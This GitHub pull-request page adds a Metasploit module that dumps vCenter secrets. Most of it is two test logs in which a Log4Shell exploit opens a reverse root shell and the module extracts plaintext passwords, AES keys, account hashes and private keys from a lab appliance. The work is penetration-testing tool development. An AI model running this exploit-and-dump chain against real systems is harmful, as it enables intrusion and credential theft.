Add vcenter_secrets_dump post module #16871

Merged
merged 8 commits into from Oct 27, 2022

Conversation

h00die
Contributor

@h00die h00die commented Aug 6, 2022

This is a rework of #16465 and expands on the work of @npm-cesium137-io, but unfortunately they seem to have gone missing (mainly due to my rework taking a long time). It moves many of the functions to a library and includes a spec so we can track changes and ensure the code is working.

This PR is part of a series of PRs. After this lands, I'll add in @ErikWynter 's two modules, but want to get this pushed to master before we start expanding so we have a good base of work to go off of.

This module adds a new post module for vCenter. To test it, you'll want to root a vCenter (I've been using my log4j box for this purpose).

Verification

  • Start msfconsole
  • use an exploit to get root on a box, such as exploit/multi/http/vmware_vcenter_log4shell
  • use vcenter_secrets_dump
  • set session 1
  • run
  • Verify no errors are encountered
  • Documentation looks good

@h00die
Contributor Author

h00die commented Aug 6, 2022

@ErikWynter @npm-cesium137-io can you all test this module? I suspect there are still some bugs (hence why it's a draft) since my vCenter doesn't have any ESXs connected to control, and there are many ways to configure vCenter other than what I have.

Please post (sanitized) output here. I left the docs in their old state until I can finalize everything a bit more.

@jmartin-tech
Contributor

@msjenkins-r7 test this please.

Contributor

@dwelch-r7 dwelch-r7 left a comment


Nice work, love the comments :D

There seems to be some overlap in the functionality you have here with other libs; might be a good idea to have a discussion on how we want to consolidate them? Things like vm_dir, for example.

@h00die
Contributor Author

h00die commented Sep 3, 2022

I'm going to go ahead and open this up. While it isn't 100% finished, I don't have SSO set up and am hoping someone who does can test that portion. It's the last part, and I just need to know what the output is from the cmd_exec command to lib it all up. Other than that move, I think the rest is ready to test.

@h00die h00die marked this pull request as ready for review September 3, 2022 19:50
@smcintyre-r7
Contributor

I don't have SSO set up and am hoping someone who does can test that portion. It's the last part, and I just need to know what the output is from the cmd_exec command to lib it all up.

Are we blocked on this? I can't guarantee we'll have an SSO setup for testing, so if we're blocked on that, would it make sense to just omit it for now?

@h00die
Contributor Author

h00die commented Sep 12, 2022

Module will work w/o it, so shouldn't be a blocker.

@smcintyre-r7 smcintyre-r7 self-assigned this Sep 15, 2022
@h00die
Contributor Author

h00die commented Sep 19, 2022

Updated to address comments.
It's been so long I'm not sure if I was getting this error before; will trace it down this week to see if it's in my code or a payload issue.

[*] Dumping vmdir schema to LDIF and storing to loot...
[-] Failed to open file: /tmp/.vsphere.local_20220918213126.tmp: core_channel_open: Operation failed: 1
[!] Unable to retrieve ldif contents
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/h00die/.msf4/loot/20220918213127_default_192.168.2.203_vmca_090364.key
[+] VMCA_ROOT cert: /home/h00die/.msf4/loot/20220918213128_default_192.168.2.203_vmca_058942.pem
[!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files...
[-] Error processing IdP trusted certificate private key

@h00die
Contributor Author

h00die commented Sep 29, 2022

looks like this was in the previous commit, looking into it still

@ErikWynter
Contributor

@h00die thanks for continuing to work on this! Unfortunately I haven't come across a vulnerable instance in quite a while, but next time I do, I'll try to run this one

@h00die
Contributor Author

h00die commented Sep 30, 2022

Problem solved; I believe it's ready for review again.

@h00die
Contributor Author

h00die commented Oct 21, 2022

Just checking in on this before it falls off the to-do list.

@bwatters-r7
Contributor

msf6 exploit(multi/http/vmware_vcenter_log4shell) > run

[*] Started reverse TCP handler on 10.5.135.109:4568 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443      - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.109:4568 -> 10.5.132.114:54020) at 2022-10-24 12:11:36 -0500
[*] Server stopped.


id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump 
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > show options

Module options (post/linux/gather/vcenter_secrets_dump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


Post action:

   Name  Description
   ----  -----------
   Dump  Dump vCenter Secrets


msf6 post(linux/gather/vcenter_secrets_dump) > run

[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] 	ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] 	KEY: ,47SU\=+fh<9C?m
[+] 	HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] 	HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] 	VCDB Name: VCDB
[+] 	VCDB User: vc
[+] 	VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221024122441_default_10.5.132.114_vmdir_498874.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] 	  SSOUSER: photon-machine.moose@vsphere.local
[+] 	  SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] 	SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221024122442_default_10.5.132.114_vmca_742773.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221024122442_default_10.5.132.114_vmca_566968.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114_idp_092125.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114_idp_845777.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114___MACHINE_CERT_346174.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114___MACHINE_CERT_187599.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_machine_089886.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_machine_123421.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vspherewebclien_672781.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vspherewebclien_063188.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vpxd_910040.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vpxd_061784.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_vpxdextension_701482.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_vpxdextension_317366.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_dataenciphermen_955390.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_dataenciphermen_886266.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221024122446_default_10.5.132.114_sms_self_signed_127498.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221024122446_default_10.5.132.114_sms_self_signed_611042.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed

@bwatters-r7
Contributor

Just checking in on this before it falls off the to-do list.

#16871 (comment) still looks unresponded to/unresolved.

@h00die
Contributor Author

h00die commented Oct 24, 2022

Good catch, the GUI was hiding that from me. Merged, tested, uploaded.

@smcintyre-r7 smcintyre-r7 removed their assignment Oct 25, 2022
@bwatters-r7
Contributor

msf6 exploit(multi/http/vmware_vcenter_log4shell) > run

[*] Started reverse TCP handler on 10.5.135.109:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443      - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.109:4444 -> 10.5.132.114:57164) at 2022-10-27 10:53:23 -0500
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump 
msf6 post(linux/gather/vcenter_secrets_dump) > show options

Module options (post/linux/gather/vcenter_secrets_dump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Post action:

   Name  Description
   ----  -----------
   Dump  Dump vCenter Secrets


msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > run

[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] 	ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] 	KEY: ,47SU\=+fh<9C?m
[+] 	HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] 	HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] 	VCDB Name: VCDB
[+] 	VCDB User: vc
[+] 	VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221027110049_default_10.5.132.114_vmdir_949273.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] 	  SSOUSER: photon-machine.moose@vsphere.local
[+] 	  SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] 	SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_vmca_128689.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_vmca_979914.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_idp_766703.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_idp_956011.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221027110051_default_10.5.132.114___MACHINE_CERT_931284.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221027110051_default_10.5.132.114___MACHINE_CERT_492725.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_machine_948197.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_machine_946055.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vspherewebclien_601663.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vspherewebclien_043993.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxd_210288.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxd_029440.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxdextension_414011.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxdextension_483742.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_dataenciphermen_605774.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_dataenciphermen_742464.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_sms_self_signed_644974.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_sms_self_signed_021024.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed

@bwatters-r7 bwatters-r7 merged commit 40fca92 into rapid7:master Oct 27, 2022
@bwatters-r7
Contributor

Release Notes

Add post/linux/gather module to dump vCenter vmdir dcAccountPassword and platform certificates.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 27, 2022
@h00die
Contributor Author

h00die commented Oct 27, 2022

@npm-cesium137-io just wanted to make sure you saw this landed to framework. Sorry it took so long!
@ErikWynter I'll start working on the database portion soon!

@h00die h00die deleted the vcenter_gather branch October 27, 2022 22:12
@ErikWynter
Contributor

ErikWynter commented Oct 28, 2022

@h00die congrats! Feel free to ping me if you have any questions about the db stuff or run into anything weird.

print_status('Found SSO Identity Source Credential:')
print_good("#{sso_prov_type} @ #{sso_conn_str}:")
print_good("\t SSOUSER: #{sso_user}")
print_good("\t SSOPASS: #{sso_pass}")

@h00die @npm-cesium137-io I came across a vCenter today where the password contains a single \; however, the module printed \\. I'll debug tomorrow, at which stage we shall de-escape.


@h00die: Correction. The password I got wrongly on screen is not the above but this one: print_good("vSphere SSO DC PW: #{bind_pw}") coming from get_domain_dc_password of lib/msf/core/post/vcenter/vcenter.rb.
The string grepped from the registry is already backslash-escaped, which works well for self.shell_bind_pw (and later use in a shell command), but for the screen and for store_valid_credential we shall de-escape it.
Example:

  • on screen and stored as credential: vSphere SSO DC PW: Password\\123
  • the actual password is: Password\123

Other special characters might in theory be escaped too, though.


Funny update. My bind password has a backtick too, which is a special character for bash, so apart from escaping " via self.bind_pw = bind_pw.gsub('"') { '\\"' } we shall escape the backtick too for the shell_bind_pw variable.
Besides, I believe escaping " and the backtick shall be done for shell_bind_pw only and not for bind_pw, which is printed and stored as a credential.
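The split the two comments above ask for (de-escape the registry string once, then derive the printable/stored value and a shell-safe value from it), as an added example that is not code from the module or from lib/msf/core/post/vcenter/vcenter.rb. It assumes lwregshell returns the value backslash-escaped (every "\x" stands for the literal character x, as in the Password\\123 case above) and that the library splices shell_bind_pw into a double-quoted bash string; Shellwords is the Ruby stdlib module.

```ruby
# frozen_string_literal: true
require 'shellwords'

# Added example, not code from the Metasploit module or its vcenter library.
# Models the two forms of the vmdir bind password discussed in the review:
#   bind_pw       - the real password, for print_good and store_valid_credential
#   shell_bind_pw - the value that is safe to splice into a shell command line
# Assumption: lwregshell returns the value backslash-escaped, so every "\x"
# stands for the literal character x (a doubled backslash is one backslash).

# Undo the registry's backslash escaping so the real password is recovered.
def unescape_registry_value(raw)
  raw.gsub(/\\(.)/m) { Regexp.last_match(1) }
end

# The approach quoted from the library: only double quotes are escaped, and the
# value (assumption) sits inside a double-quoted bash string. Bash still performs
# command and parameter expansion inside "...", so backticks and $ stay live.
def naive_shell_bind_pw(real_pw)
  '"' + real_pw.gsub('"') { '\\"' } + '"'
end

# Characters bash still interprets inside "..." that the naive quoting leaves live.
def still_active_in_double_quotes(quoted)
  body = quoted[1..-2] # drop the surrounding double quotes
  ['`', '$'].select { |c| body.include?(c) }
end

# Shellwords.escape (Ruby stdlib) backslash-escapes every shell-special byte,
# so the password reaches the command exactly as it is, whatever it contains.
def safe_shell_bind_pw(real_pw)
  Shellwords.escape(real_pw)
end

# De-escape once, then derive both forms from the real password instead of
# reusing the registry string for either of them.
def bind_password_forms(registry_value)
  real = unescape_registry_value(registry_value)
  { bind_pw: real, shell_bind_pw: safe_shell_bind_pw(real) }
end

# Constructed sample registry value for the real password  Pass\word`123
# (a backslash and a backtick, the two characters raised in the comments).
SAMPLE_REGISTRY_VALUE = 'Pass\\\\word`123'

if $PROGRAM_NAME == __FILE__
  forms = bind_password_forms(SAMPLE_REGISTRY_VALUE)
  naive = naive_shell_bind_pw(forms[:bind_pw])
  puts "registry value : #{SAMPLE_REGISTRY_VALUE}"
  puts "bind_pw        : #{forms[:bind_pw]}"
  puts "naive quoting  : #{naive}  (still live in bash: #{still_active_in_double_quotes(naive).inspect})"
  puts "shell_bind_pw  : #{forms[:shell_bind_pw]}"
end
```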

end
# pull out the name from the url
unless output['url'].nil?
output['name'] = output['url'].split('/').last

@h00die: it may also have the form jdbc:postgresql://localhost:5432/VCDB?sslmode=disable
In that case an additional split('?')[0] (or similar) is required.

@h00die
Contributor Author

h00die commented Nov 3, 2022

@HynekPetrak these are really good issues/things to bring up. Can you start an issue and tag me on it so they don't get lost on this already merged module? I'll either add the updates to #17214 or PR them up if that one lands before I can get to these.

@npm-cesium137-io
Contributor

@npm-cesium137-io just wanted to make sure you saw this landed to framework. Sorry it took so long! @ErikWynter I'll start working on the database portion soon!

Hi, I'm amazed that you were able to whip that, uhm, comprehensive pile of code I plopped here into something workable, can't wait to try it out! P.S. trying to deal with all the shell escaping for bind / DB passwords shaved years off my life, too, IKTF.
